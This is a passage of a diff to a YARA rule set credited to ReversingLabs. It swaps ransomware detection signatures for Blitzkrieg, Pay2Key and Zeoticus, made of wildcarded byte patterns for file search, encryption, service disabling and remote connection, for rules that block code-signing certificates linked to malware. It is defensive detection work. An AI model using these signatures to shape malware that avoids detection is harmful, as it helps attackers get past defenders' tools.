-            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "5c:88:31:3b:d9:8b:de:99:c9:b9:ac:14:08:a6:32:49" and 1474243200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Blitzkrieg : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7A632A6Ecfc6C49Ec1F42F76 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Blitzkrieg ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "078f7f9d-edd4-52b4-a30e-e968542da95c"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "863a109c-034f-5168-9470-8fd4945e6e92"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Blitzkrieg.yara#L1-L127"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "22dd16c886a1982186fe927e633be9951da7d7e664e877e11fa976696b2bc86f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13874-L13890"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "038badeab61c00476b79684308bf91f8a63716641f2be16fe0a3b25ebd3a9a1e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Blitzkrieg"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 55 ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ??
-            ?? 64 FF 30 64 89 20 8B 45 ?? 8B 40 ?? 8B 10 FF 52 ?? 8B F0 4E 83 FE ?? 0F 8C ?? ??
-            ?? ?? 8B 45 ?? 8B 48 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 A0 ?? ?? ?? ?? 88
-            43 ?? C6 43 ?? ?? 8D 4D ?? 8B 45 ?? 8B 40 ?? 8B D6 8B 38 FF 57 ?? 8B 55 ?? 8B C3 E8
-            ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? 8B C3 E8 ?? ?? ?? ?? 8B D3
-            8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 4B ?? 89 0C
-            82 4E 83 FE ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 84 C0 74 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$search_files_p1 = {
-            E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? B2 ?? A1 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? F6 40 ?? ?? 74 ?? FF 45 ?? 8B 45 ?? F6 40
-            ?? ?? 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ??
-            74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 83 45 ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 52 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ??
-            E8 ?? ?? ?? ?? 85 C0 7E ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 8B 52 ??
-            48 85 D2 74 ?? 3B 42 ?? 72 ?? E8 ?? ?? ?? ?? 40 80 7C 02 ?? ?? 74 ?? 8D 85 ?? ?? ??
-            ?? 8B 55 ?? 8B 4D ?? 8B 49 ?? 4A 85 C9 74 ?? 3B 51 ?? 72 ?? E8 ?? ?? ?? ?? 42 8A 54
-            11 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? EB ?? 8B 55 ?? 8B 45
-            ?? 8B 08 FF 51 ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 45 ?? FF 4D ?? 75 ?? 8B 45 ?? 8B 10 FF
-            52 ?? 48 85 C0 0F 8C ?? ?? ?? ?? 40 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            8B 55 ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 8B 8D ?? ?? ?? ?? 8B 55
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 0F 8F ?? ?? ?? ?? 8B 55 ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 8F ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 55 ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 85 C0 7F ?? 8B 45 ?? 8B 40 ?? 50 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B D8 B2 ?? 8B C3 E8 ?? ?? ?? ?? 8B D3 8B 45 ?? E8 ?? ?? ?? ?? 8B 45
-        }
-		$search_files_p2 = {
-            E8 ?? ?? ?? ?? 40 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 85 D2 74 ?? 3B 42 ?? 72 ?? E8 ?? ?? ?? ?? 8B 4B
-            ?? 89 0C 82 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8B
-            45 ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0
-            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ??
-            EB ?? FF 45 ?? FF 4D ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8D 85 ?? ?? ?? ??
-            8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ??
-            8B 48 ?? 8B 45 ?? E8
-        }
-		$disable_services_p1 = {
-            E8 ?? ?? ?? ?? 8B F0 BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-        }
-		$disable_services_p2 = {
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
-            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
-            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
-            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? 8B 55 ?? 8B C6 8B 08 FF 51 ?? 6A ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 C9 33 D2 E8 ?? ?? ?? ?? 33 C0 5A
-            59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "7a:63:2a:6e:cf:c6:c4:9e:c1:f4:2f:76" and 1474959780 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_F57Df6A6Eee3854D513D0Ba8585049B7 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "b31f73d5-ff9e-5be7-b806-8838ddb5d29d"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13892-L13910"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "09d5998960fb65eda56cd698c5ff50d87ba7a811cbb128bc7485c0f124e14cba"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $disable_services_p* ) ) and ( all of ( $search_files_p* ) ) and ( $encrypt_files ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "smnetworks" and ( pe.signatures [ i ] . serial == "00:f5:7d:f6:a6:ee:e3:85:4d:51:3d:0b:a8:58:50:49:b7" or pe.signatures [ i ] . serial == "f5:7d:f6:a6:ee:e3:85:4d:51:3d:0b:a8:58:50:49:b7" ) and 1277769600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Pay2Key : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0Ac5Ac5D323122E6D8E92D6E191B1432 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Pay2Key ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2e482222-0483-5fe3-bb87-cfadda8e7e7a"
-		date = "2021-04-14"
-		modified = "2021-04-14"
+		id = "9a363a84-c21c-5afe-9812-9ce16962b28a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Pay2Key.yara#L1-L99"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2497504f3afc99523cb29e51652a24f4374316d57d4baf5cde8d22e75a425585"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13912-L13928"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d5e62d3cdfacfaea70f9ee11230501bb9c4099508077d50a2a143cb69476f02a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Pay2Key"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ??
-            41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
-            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
-            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ??
-            56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50
-            50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5
-            89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA
-            ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF
-            80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41
-            F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ??
-            ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56
-            FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ??
-            2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9
-            74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
-            ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B
-            C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
-            ?? E9
-        }
-		$encrypt_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
-            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            8B 43 ?? 2B 43 ?? 75 ?? 8B 75 ?? 8B 45 ?? 8B 4D ?? C7 45 ?? ?? ?? ?? ?? 89 06 89 4E
-            ?? 8B 4D ?? 89 4E ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 ?? ?? 83 7B ?? ?? 74
-            ?? 8B 45 ?? 2B 45 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 8B F8 8B 55 ?? 2B F2 56 52 57 E8 ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ??
-            56 89 75 ?? E8 ?? ?? ?? ?? 56 57 50 89 45 ?? E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? 83 C4
-            ?? 50 56 6A ?? 6A ?? 6A ?? FF 73 ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 85 C0 75 ?? 8B 75 ??
-            89 45 ?? 89 45 ?? 89 45 ?? 89 06 89 46 ?? 89 46 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 ?? ?? FF 75 ?? E8
-            ?? ?? ?? ?? FF 75 ?? 56 8B 75 ?? 56 E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8B 4D ?? 8B 45
-            ?? C7 45 ?? ?? ?? ?? ?? 89 4F ?? 8D 4D ?? 89 37 89 47 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ??
-            ?? ?? 59 5F 5E 5B 8B E5 5D C2
-        }
-		$remote_connection_p1 = {
-            55 8B EC 83 EC ?? 56 57 6A ?? 8B F2 8B F9 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? C7
-            45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 56 57 FF 15 ?? ?? ?? ??
-            8B 75 ?? 8B C8 8B D6 E8 ?? ?? ?? ?? 8B 0E 8B F8 83 F9 ?? 75 ?? 68 ?? ?? ?? ?? 8B CE
-            E8 ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? EB
-            ?? 81 F9 ?? ?? ?? ?? 74 ?? 81 F9 ?? ?? ?? ?? 74 ?? 85 FF 74 ?? 5F 83 C8 ?? 5E 8B E5
-            5D C3
-        }
-		$remote_connection_p2 = {
-            55 8B EC 51 53 56 8B F1 57 8B 46 ?? 83 C0 ?? 50 FF 15 ?? ?? ?? ?? 80 7D ?? ?? 6A ??
-            74 ?? 8B 4E ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? ?? 8B 45 ?? 8B 08
-            83 F9 ?? 75 ?? 8B 4E ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ??
-            ?? 8B 45 ?? 8B 7D ?? 57 89 45 ?? 8D 45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75
-            ?? FF 75 ?? 51 FF 15 ?? ?? ?? ?? 8B D8 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? B8 ?? ?? ??
-            ?? EB ?? 3D ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C1 85 DB 74 ?? 3D ?? ?? ?? ?? 74 ?? FF
-            75 ?? 8B 4E ?? 50 57 E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? ?? 8B 4E ?? 57 E8 ?? ?? ??
-            ?? 5F 5E 5B 59 5D C2
-        }
-		$remote_connection_p3 = {
-            55 8B EC 83 EC ?? 56 57 6A ?? 8B F2 8B F9 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 45
-            ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 56 57 FF 15 ?? ?? ?? ?? 8B 75 ?? 8B C8 8B D6 E8
-            ?? ?? ?? ?? 8B 0E 8B F8 83 F9 ?? 75 ?? 68 ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? 75 ??
-            68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 FF 74 ?? 5F 83 C8 ?? 5E 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Certified Software" and pe.signatures [ i ] . serial == "0a:c5:ac:5d:32:31:22:e6:d8:e9:2d:6e:19:1b:14:32" and 1140134400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_2433D9Df7Efbccb870Ee5904D62A0101 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "6cd46771-06ea-51c9-ad84-4b28f4f8442b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13930-L13946"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "92a2effe1b94345f52130e4cb1db181f1990e58eaefb9c74375c14249cc1be22"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Conpavi AG" and pe.signatures [ i ] . serial == "24:33:d9:df:7e:fb:cc:b8:70:ee:59:04:d6:2a:01:01" and 1322438400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Zeoticus : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_462Baada57570F70Df76D10B9E7Bf2B7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Zeoticus ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "483b20a4-2c16-5509-a503-2462a53d4d31"
-		date = "2021-03-19"
-		modified = "2021-03-19"
+		id = "2863a050-ebce-5322-b64a-9160adf6cc21"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
